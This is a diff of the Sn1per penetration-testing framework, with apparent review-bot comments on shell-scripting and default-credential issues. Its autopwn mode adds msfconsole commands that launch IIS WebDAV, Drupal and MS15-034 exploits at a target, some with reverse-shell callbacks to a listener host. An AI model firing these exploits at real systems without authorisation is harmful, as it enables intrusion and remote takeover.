@@ -102,7 +102,7 @@ if [ "$RECON" = "1" ]; then subover -l $LOOT_DIR/domains/domains-$TARGET-full.txt | tee $LOOT_DIR/nmap/subover-$TARGET 2>/dev/null sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/nmap/subover-$TARGET > $LOOT_DIR/nmap/subover-$TARGET.txt 2> /dev/null rm -f $LOOT_DIR/nmap/subover-$TARGET 2> /dev/null - diff $LOOT_DIR/nmap/subover_old-$TARGET.txt $LOOT_DIR/nmap/subover-$TARGET.txt | grep "> " 2> /dev/null | awk '{$1=""; print $0}' 2> /dev/null > $LOOT_DIR/nmap/subover_new-$TARGET.txt + diff $LOOT_DIR/nmap/subover_old-$TARGET.txt $LOOT_DIR/nmap/subover-$TARGET.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{$1=""; print $0}' 2> /dev/null > $LOOT_DIR/nmap/subover_new-$TARGET.txt if [ "$SLACK_NOTIFICATIONS_SUBOVER_NEW" == "1" ]; then /bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/subover_new-$TARGET.txt" fi @@ -114,7 +114,7 @@ if [ "$RECON" = "1" ]; then echo -e "${OKGREEN}====================================================================================${RESET}" cp $LOOT_DIR/nmap/subjack-$TARGET.txt $LOOT_DIR/nmap/subjack_old-$TARGET.txt 2> /dev/null ~/go/bin/subjack -w $LOOT_DIR/domains/domains-$TARGET-full.txt -t $THREADS -timeout 30 -o $LOOT_DIR/nmap/subjack-$TARGET.txt -a -v - diff $LOOT_DIR/nmap/subjack_old-$TARGET.txt $LOOT_DIR/nmap/subjack-$TARGET.txt | grep "> " 2> /dev/null | awk '{$1=""; print $0}' 2> /dev/null > $LOOT_DIR/nmap/subjack_new-$TARGET.txt + diff $LOOT_DIR/nmap/subjack_old-$TARGET.txt $LOOT_DIR/nmap/subjack-$TARGET.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{$1=""; print $0}' 2> /dev/null > $LOOT_DIR/nmap/subjack_new-$TARGET.txt if [ "$SLACK_NOTIFICATIONS_SUBJACK_NEW" == "1" ]; then /bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/subjack_new-$TARGET.txt" fi diff --git a/modes/stealth.sh b/modes/stealth.sh index 28e5e01e..ff8d676a 100644 --- a/modes/stealth.sh +++ b/modes/stealth.sh 
@@ -76,9 +76,19 @@ if [ "$MODE" = "stealth" ]; then echo -e "$RESET" echo -e "$OKORANGE + -- --=[Launching stealth scan: $TARGET $RESET" echo -e "$OKGREEN $RESET" - echo "$TARGET" >> $LOOT_DIR/domains/targets.txt - + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED GATHERING WHOIS INFO $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + if [ "$WHOIS" == "1" ]; then + if [ "$VERBOSE" == "1" ]; then + echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN whois $TARGET 2> /dev/null | tee $LOOT_DIR/osint/whois-$TARGET.txt 2> /dev/null $RESET" + fi + whois $TARGET 2> /dev/null | tee $LOOT_DIR/osint/whois-$TARGET.txt 2> /dev/null + if [ "$SLACK_NOTIFICATIONS_WHOIS" == "1" ]; then + /bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/osint/whois-$TARGET.txt" + fi + fi echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED GATHERING DNS INFO $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" diff --git a/modes/vulnscan.sh b/modes/vulnscan.sh new file mode 100644 index 00000000..bab11f3f --- /dev/null +++ b/modes/vulnscan.sh 
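Review bot: The three `+ echo -e` banner lines for `GATHERING WHOIS INFO` are printed before the `+ if [ "$WHOIS" == "1" ]` test, so the header appears even when whois is disabled; move them inside the `if`, as the `SLACK_NOTIFICATIONS_WHOIS` block already is. Output goes to `$LOOT_DIR/osint/`, and nothing in this hunk creates that directory for stealth mode — if the mode's setup does not `mkdir` it, the `tee` fails silently under `2> /dev/null`. The removed `echo "$TARGET" >> $LOOT_DIR/domains/targets.txt` is not re-added anywhere in the hunk, so stealth scans no longer record the target; confirm that is intended. The enclosing `if [ "$MODE" = "stealth" ]` starts outside the hunk.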
@@ -0,0 +1,74 @@ +# FULLPORTONLY MODE +if [ "$MODE" = "vulnscan" ]; then + + if [ "$REPORT" = "1" ]; then + args="-t $TARGET" + + if [ ! -z "$WORKSPACE" ]; then + args="$args -w $WORKSPACE" + LOOT_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE + echo -e "$OKBLUE[*] Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET" + mkdir -p $LOOT_DIR 2> /dev/null + mkdir $LOOT_DIR/domains 2> /dev/null + mkdir $LOOT_DIR/screenshots 2> /dev/null + mkdir $LOOT_DIR/nmap 2> /dev/null + mkdir $LOOT_DIR/notes 2> /dev/null + mkdir $LOOT_DIR/reports 2> /dev/null + mkdir $LOOT_DIR/scans 2> /dev/null + mkdir $LOOT_DIR/output 2> /dev/null + fi + + args="$args --noreport -m vulnscan" + echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null + echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-vulnscan.txt + sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1 + exit + fi + + logo + + if [ "$SLACK_NOTIFICATIONS" == "1" ]; then + /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" + fi + + echo "$TARGET" >> $LOOT_DIR/domains/targets.txt + + if [ "$OPENVAS" = "1" ]; then + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING OPENVAS VULNERABILITY SCAN $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + ASSET_ID=$(omp -u $OPENVAS_USERNAME -w $OPENVAS_PASSWORD --xml="$TARGET$TARGET" | xmlstarlet sel -t -v /create_target_response/@id) && echo "ASSET_ID: $ASSET_ID" + TASK_ID=$(omp -u $OPENVAS_USERNAME -w $OPENVAS_PASSWORD --xml "$TARGETsource_ifaceeth0" | xmlstarlet sel -t -v /create_task_response/@id) && echo "TASK_ID: $TASK_ID" + REPORT_ID=$(omp -u $OPENVAS_USERNAME -w $OPENVAS_PASSWORD --xml "" | cut -d\> -f3 | cut -d\< -f1) && 
echo "REPORT_ID: $REPORT_ID" + resp="" + while [[ $resp != "Done" && $REPORT_ID != "" ]] + do + omp -u $OPENVAS_USERNAME -w $OPENVAS_PASSWORD -G | grep $TARGET + resp=$(omp -u $OPENVAS_USERNAME -w $OPENVAS_PASSWORD -G | grep $TARGET | awk '{print $2}') + sleep 60 + done + if [ $REPORT_ID != "" ]; then + omp -u $OPENVAS_USERNAME -w $OPENVAS_PASSWORD --xml "" | cut -d\> -f3 | cut -d\< -f1 | base64 -d > "$LOOT_DIR/output/openvas-$TARGET.html" + + echo "Report saved to $LOOT_DIR/output/openvas-$TARGET.html" + else + echo "No report ID found. Listing scan tasks:" + omp -u $OPENVAS_USERNAME -w $OPENVAS_PASSWORD -G | grep $TARGET + fi + fi + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED DONE $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + echo "$TARGET" >> $LOOT_DIR/scans/updated.txt + if [ "$SLACK_NOTIFICATIONS_NMAP" == "1" ]; then + /bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/nmap-$TARGET.txt" + /bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/nmap-$TARGET-udp.txt" + fi + if [ "$SLACK_NOTIFICATIONS" == "1" ]; then + /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" + fi + loot + exit +fi + + diff --git a/modes/web_autopwn.sh b/modes/web_autopwn.sh index b258b4a6..2ec37b28 100644 --- a/modes/web_autopwn.sh +++ b/modes/web_autopwn.sh 
@@ -2,21 +2,27 @@ /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per webpwn scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" fi echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING JBOSS VULN SCANNER $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use scanner/http/jboss_vulnscan; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-jboss_vulnscan.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-jboss_vulnscan.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-jboss_vulnscan.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-jboss_vulnscan.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED RUNNING HTTP PUT UPLOAD SCANNER $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use scanner/http/http_put; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg SSL false; run; set PATH /uploads/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw + msfconsole -q -x "use scanner/http/http_put; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; set PATH /uploads/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.txt 2> /dev/null rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw 2> /dev/null echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED RUNNING 
WEBDAV SCANNER $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg SSL false; run; use scanner/http/webdav_website_content; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw + msfconsole -q -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; use scanner/http/webdav_website_content; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.txt 2> /dev/null rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw 2> /dev/null echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED RUNNING MICROSOFT IIS WEBDAV ScStoragePathFromUrl OVERFLOW $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/windows/iis/iis_webdav_scstoragepathfromurl; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg SSL false; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw + msfconsole -q -x "use exploit/windows/iis/iis_webdav_scstoragepathfromurl; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw > 
$LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.txt 2> /dev/null rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw 2> /dev/null echo -e "${OKGREEN}====================================================================================${RESET}" @@ -80,6 +86,12 @@ sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.txt 2> /dev/null rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw 2> /dev/null echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING MS15-034 HTTP.SYS MEMORY LEAK EXPLOIT $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED RUNNING GLASSFISH ADMIN TRAVERSAL EXPLOIT $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" msfconsole -q -x "use scanner/http/glassfish_traversal; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-glassfish_traversal.raw 
@@ -193,6 +205,12 @@ msfconsole -q -x "use unix/webapp/drupal_restws_unserialize; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; setg URI /drupal/; setg TARGETURI /drupal/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_restws_unserialize.raw sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_restws_unserialize.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_restws_unserialize.txt 2> /dev/null rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_restws_unserialize.raw 2> /dev/null + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING JAVA RMI SCANNER $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" + msfconsole -q -x "use auxiliary/scanner/misc/java_rmi_server; setg RHOSTS \"$TARGET\"; set RPORT \"$PORT\"; run; back; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-java_rmi_server.raw + sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-java_rmi_server.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-java_rmi_server.txt 2> /dev/null + rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-java_rmi_server.raw 2> /dev/null if [ "$SLACK_NOTIFICATIONS" == "1" ]; then /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Finished Sn1per webpwn scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" fi diff --git a/modes/webporthttp.sh b/modes/webporthttp.sh index a62e413d..9a64e975 100644 --- a/modes/webporthttp.sh +++ b/modes/webporthttp.sh 
@@ -14,7 +14,7 @@ if [ "$MODE" = "webporthttp" ]; then mkdir $LOOT_DIR/scans 2> /dev/null mkdir $LOOT_DIR/output 2> /dev/null fi - echo "$TARGET $MODE port$PORT `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null + echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null echo "sniper -t $TARGET -m $MODE -p $PORT --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt if [ "$SLACK_NOTIFICATIONS" == "1" ]; then /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: http://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" diff --git a/modes/webporthttps.sh b/modes/webporthttps.sh index 2995e1ca..a6e079dc 100644 --- a/modes/webporthttps.sh +++ b/modes/webporthttps.sh @@ -14,7 +14,7 @@ if [ "$MODE" = "webporthttps" ]; then mkdir $LOOT_DIR/scans 2> /dev/null mkdir $LOOT_DIR/output 2> /dev/null fi - echo "$TARGET $MODE port$PORT `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null + echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null echo "sniper -t $TARGET -m $MODE -p $PORT --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt if [ "$SLACK_NOTIFICATIONS" == "1" ]; then /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per scan: https://$TARGET:$PORT [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" diff --git a/modes/webscan.sh b/modes/webscan.sh index 59c072d8..47ffcd4c 100644 --- a/modes/webscan.sh +++ b/modes/webscan.sh 
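Review bot: Dropping `port$PORT` from the tasks.txt record on the `+ echo` line makes two scans of the same target on different ports write identical lines, so anything that reads `$LOOT_DIR/scans/tasks.txt` can no longer distinguish them; if the goal is a uniform record format across modes, keep the port as its own field rather than removing it. The same change is made in the webporthttps.sh hunk on this line. The enclosing `if [ "$MODE" = ... ]` starts outside both hunks.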
@@ -53,14 +53,31 @@ if [ "$MODE" = "webscan" ]; then echo -e "${OKGREEN}====================================================================================${RESET}" echo -e "$OKRED RUNNING BURPSUITE SCAN $RESET" echo -e "${OKGREEN}====================================================================================${RESET}" - if [ "$VERBOSE" == "1" ]; then - echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl -X POST \"http://$BURP_HOST:$BURP_PORT/v0.1/scan\" -d \"{\"scope\":{\"include\":[{\"rule\":\"http://$TARGET:80\"}],\"type\":\"SimpleScope\"},\"urls\":[\"http://$TARGET:80\"]}\"$RESET" - fi curl -s -X POST "http://$BURP_HOST:$BURP_PORT/v0.1/scan" -d "{\"scope\":{\"include\":[{\"rule\":\"http://$TARGET:80\"}],\"type\":\"SimpleScope\"},\"urls\":[\"http://$TARGET:80\"]}" curl -s -X POST "http://$BURP_HOST:$BURP_PORT/v0.1/scan" -d "{\"scope\":{\"include\":[{\"rule\":\"https://$TARGET:443\"}],\"type\":\"SimpleScope\"},\"urls\":[\"https://$TARGET:443\"]}" - echo "" + echo "" + for a in {1..30}; + do + echo -n "[-] SCAN #$a: " + curl -sI "http://127.0.0.1:1337/v0.1/scan/$a" | grep HTTP | awk '{print $2}' + BURP_STATUS=$(curl -s http://127.0.0.1:1337/v0.1/scan/$a | grep -o -P "crawl_and_audit.{1,100}" | cut -d\" -f3 | grep "remaining") + while [[ ${#BURP_STATUS} -gt "5" ]]; + do + BURP_STATUS=$(curl -s http://127.0.0.1:1337/v0.1/scan/$a | grep -o -P "crawl_and_audit.{1,100}" | cut -d\" -f3 | grep "remaining") + BURP_STATUS_FULL=$(curl -s http://127.0.0.1:1337/v0.1/scan/$a | grep -o -P "crawl_and_audit.{1,100}" | cut -d\" -f3) + echo "[i] STATUS: $BURP_STATUS_FULL" + sleep 15 + done + echo "[+] VULNERABILITIES: " + echo "----------------------------------------------------------------" + curl -s "http://127.0.0.1:1337/v0.1/scan/$a" | grep -o -P "name.{1,100}" | cut -d\" -f3 | sort -u | tee $LOOT_DIR/web/burpsuite-$TARGET-$a.txt + done + echo "[-] Done!" 
fi if [ "$ARACHNI_SCAN" == "1" ]; then + echo -e "${OKGREEN}====================================================================================${RESET}" + echo -e "$OKRED RUNNING ARACHNI SCAN $RESET" + echo -e "${OKGREEN}====================================================================================${RESET}" mkdir -p $LOOT_DIR/web/http-$TARGET/ mkdir -p $LOOT_DIR/web/https-$TARGET/ arachni --report-save-path=$LOOT_DIR/web/http-$TARGET/ --output-only-positives http://$TARGET | tee $LOOT_DIR/output/sniper-$TARGET-webscan-http-`date +"%Y%m%d%H%M"`.txt 2>&1 diff --git a/sniper b/sniper index 804b175a..48e18bfb 100755 --- a/sniper +++ b/sniper @@ -3,7 +3,7 @@ # + -- --=[https://xerosecurity.com # -VER="7.1" +VER="7.2" INSTALL_DIR="/usr/share/sniper" LOOT_DIR="$INSTALL_DIR/loot/$TARGET" SNIPER_PRO=$INSTALL_DIR/pro.sh @@ -52,9 +52,6 @@ function help { echo ' [*] FULLPORTONLY SCAN MODE' echo ' sniper -t|--target -fp|--fullportonly' echo "" - echo ' [*] PORT SCAN MODE' - echo ' sniper -t|--target -m|--mode port -p|--port ' - echo "" echo ' [*] WEB MODE - PORT 80 + 443 ONLY!' echo ' sniper -t|--target -m|--mode web' echo "" @@ -76,6 +73,21 @@ function help { echo ' [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED' echo ' sniper -f--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace ' echo "" + echo ' [*] MASS PORT SCAN MODE' + echo ' sniper -f|--file -m|--mode massportscan' + echo "" + echo ' [*] MASS WEB SCAN MODE' + echo ' sniper -f|--file -m|--mode massweb' + echo "" + echo ' [*] MASS WEBSCAN SCAN MODE' + echo ' sniper -f|--file -m|--mode masswebscan' + echo "" + echo ' [*] MASS VULN SCAN MODE' + echo ' sniper -f|--file -m|--mode massvulnscan' + echo "" + echo ' [*] PORT SCAN MODE' + echo ' sniper -t|--target -m|--mode port -p|--port ' + echo "" echo ' [*] LIST WORKSPACES' echo ' sniper --list' echo "" 
@@ -273,6 +285,7 @@ case $key in read ANS rm -Rf /usr/share/sniper/loot/workspace/$WORKSPACE/ echo "Workspace /usr/share/sniper/loot/workspace/$WORKSPACE/ was removed." + sniper -w default --reimport exit shift # past argument ;; @@ -439,6 +452,9 @@ function loot { echo -e "$OKORANGE + -- --=[Loading Sn1per Professional...$RESET" source $INSTALL_DIR/pro.sh $BROWSER $LOOT_DIR/sniper-report.html 2> /dev/null > /dev/null & + elif [ "$SN1PER_AUTOLOAD" = "0" ]; then + echo -e "$OKORANGE + -- --=[Generating Sn1per Professional reports...$RESET" + source $INSTALL_DIR/pro.sh else echo -e "$OKORANGE + -- --=[Do you want to load Sn1per Professional (y or n)? $RESET" read ANS @@ -506,11 +522,16 @@ fi source modes/discover.sh source modes/flyover.sh +source modes/vulnscan.sh source modes/fullportonly.sh source modes/web.sh source modes/webporthttp.sh source modes/webporthttps.sh source modes/webscan.sh +source modes/massweb.sh +source modes/masswebscan.sh +source modes/massvulnscan.sh +source modes/massportscan.sh source modes/stealth.sh source modes/airstrike.sh source modes/nuke.sh diff --git a/sniper.conf b/sniper.conf index e6b76ae7..35901c90 100644 --- a/sniper.conf +++ b/sniper.conf @@ -29,6 +29,13 @@ BROWSER="firefox" BURP_HOST="127.0.0.1" BURP_PORT="1337" +# OPENVAS CONFIG +OPENVAS="1" +OPENVAS_USERNAME="admin" +OPENVAS_PASSWORD="" +OPENVAS_HOST="127.0.0.1" +OPENVAS_PORT="9390" + # METASPLOIT SCANNER CONFIG METASPLOIT_IMPORT="1" MSF_LHOST="127.0.0.1" @@ -38,6 +45,9 @@ MSF_LPORT="4444" CENSYS_APP_ID="" CENSYS_API_SECRET="" +# HUNTER.IO API KEY +HUNTERIO_KEY="" + # SLACK API SLACK_NOTIFICATIONS="1" SLACK_NOTIFICATIONS_THEHARVESTER="0" 
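Review bot: The added `sniper -w default --reimport` runs unconditionally after `rm -Rf /usr/share/sniper/loot/workspace/$WORKSPACE/`, which has no guard on `$WORKSPACE`: an empty value removes the whole workspace tree and a name containing `/` or `..` removes a directory outside it, and the reimport then quietly rebuilds the default workspace over the damage. Before the removal, reject unsafe names and use the `:?` expansion so an empty variable aborts rather than widening the path: `case "$WORKSPACE" in ""|*/*|.|..) echo "Invalid workspace name: $WORKSPACE" >&2; exit 1;; esac` and `rm -Rf -- "/usr/share/sniper/loot/workspace/${WORKSPACE:?}/"`. The new line also assumes `sniper` resolves on PATH rather than calling `$0` or `$INSTALL_DIR/sniper`, which I cannot confirm from here. The case arm begins outside the hunk, so the prompt that sets `ANS` is not visible.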
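Review bot: `OPENVAS="1"` turns the new, changelog-marked experimental integration on by default while `OPENVAS_PASSWORD=""` is empty and `OPENVAS_USERNAME="admin"` is fixed, so every vulnscan run will attempt an OpenVAS login with admin and no password unless the operator edits this file first; the same patch flips `CENSYS_SUBDOMAINS` to `"0"` for exactly this reason, and OpenVAS should follow suit. Ship `OPENVAS="0"` with a comment such as `# Set to "1" only after filling in OPENVAS_PASSWORD; the credential is stored in clear text, so keep this file mode 600` and have the consuming mode (not visible in this diff) refuse to run when `OPENVAS="1"` and the password is empty.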
@@ -78,11 +88,11 @@ SAMRDUMP="$INSTALL_DIR/bin/samrdump.py" INURLBR="$INSTALL_DIR/bin/inurlbr.php" # PORT SCAN CONFIGURATIONS -QUICK_PORTS="21,22,23,25,53,80,110,137,138,139,161,162,443,445,512,513,514,1433,3306,4444,5555,5432,5555,5900,5901,6667,7001,8080,8888,8000,10000" -DEFAULT_PORTS="1,7,9,13,19,21-23,25,37,42,49,53,67,68,69,79-81,85,88,105,109-111,113,123,135,137-139,143,161,162,179,222,264,384,389,402,407,443-446,465,500,502,512-515,523-524,540,548,554,587,617,623,631,655,689,705,771,783,831,873,888,902,910,912,921,993,995,998-1000,1024,1030,1035,1090,1098-1103,1128-1129,1158,1199,1211,1220,1234,1241,1300,1311,1352,1433-1435,1440,1471,1494,1521,1530,1533,1581-1582,1604,1720,1723,1755,1811,1900,2000-2001,2049,2067,2100,2103,2121,2199,2207,2222,2323,2362,2380-2381,2525,2533,2598,2638,2809,2947,2967,3000,3037,3050,3057,3128,3200,3217,3273,3299,3306,3310,3333,3389,3460,3465,3500,3628,3632,3690,3780,3790,3817,3900,4000,4322,4433,4444-4445,4659,4672,4679,4800,4848,5000,5009,5038,5040,5051,5060-5061,5093,5168,5227,5247,5250,5351,5353,5355,5400,5405,5432-5433,5466,5498,5520-5521,5554-5555,5560,5580,5631-5632,5666,5800,5814,5900-5910,5920,5984-5986,5999-6000,6050,6060,6070,6080,6082,6101,6106,6112,6161,6262,6379,6405,6502-6504,6542,6660-6661,6667,6789,6905,6988,6996,7000-7001,7021,7071,7080,7144,7181,7210,7272,7414,7426,7443,7510,7547,7579-7580,7700,7770,7777-7778,7787,7800-7801,7878-7879,7890,7902,8000-8001,8008,8014,8020,8023,8028,8030,8050-8051,8080-8082,8085-8088,8090-8091,8095,8101,8161,8180,8205,8222,8300,8303,8333,8400,8443-8445,8503,8642,8686,8701,8787,8800,8812,8834,8880,8888-8890,8899,8901-8903,8980,8999-9005,9010,9050,9080-9081,9084,9090,9099-9100,9111,9152,9200,9256,9300,9390-9391,9495,9500,9711,9788,9809-9815,9855,9875,9910,9991,9999-10001,10008,10050-10051,10080,10098-10099,10162,10202-10203,10443,10616,10628,11000-11001,11099,11211,11234,11333,11460,12000,12174,12203,12221,12345,12397,12401,13013,13364,13500,13838,14000,14330,15000-15001,15200,16000,161
02,16992,17185,17200,18881,18980,19300,19810,20000,20010,20031,20034,20101,20111,20171,20222,22222,23423,23472,23791,23943,25000,25025,26000,26122,26256,27000,27015,27017,27888,27960,28222,28784,30000,30718,31001,31099,32022,32764,32913,33000,34205,34443,37718,37777,38080,38292,40007,41025,41080,41523-41524,44334,44818,45230,46823-46824,47001-47002,48080,48899,49152,50000-50004,50013,50050,50500-50504,52302,52869,53413,55553,57772,62078,62514,65535,U:53,U:67,U:68,U:69,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049" 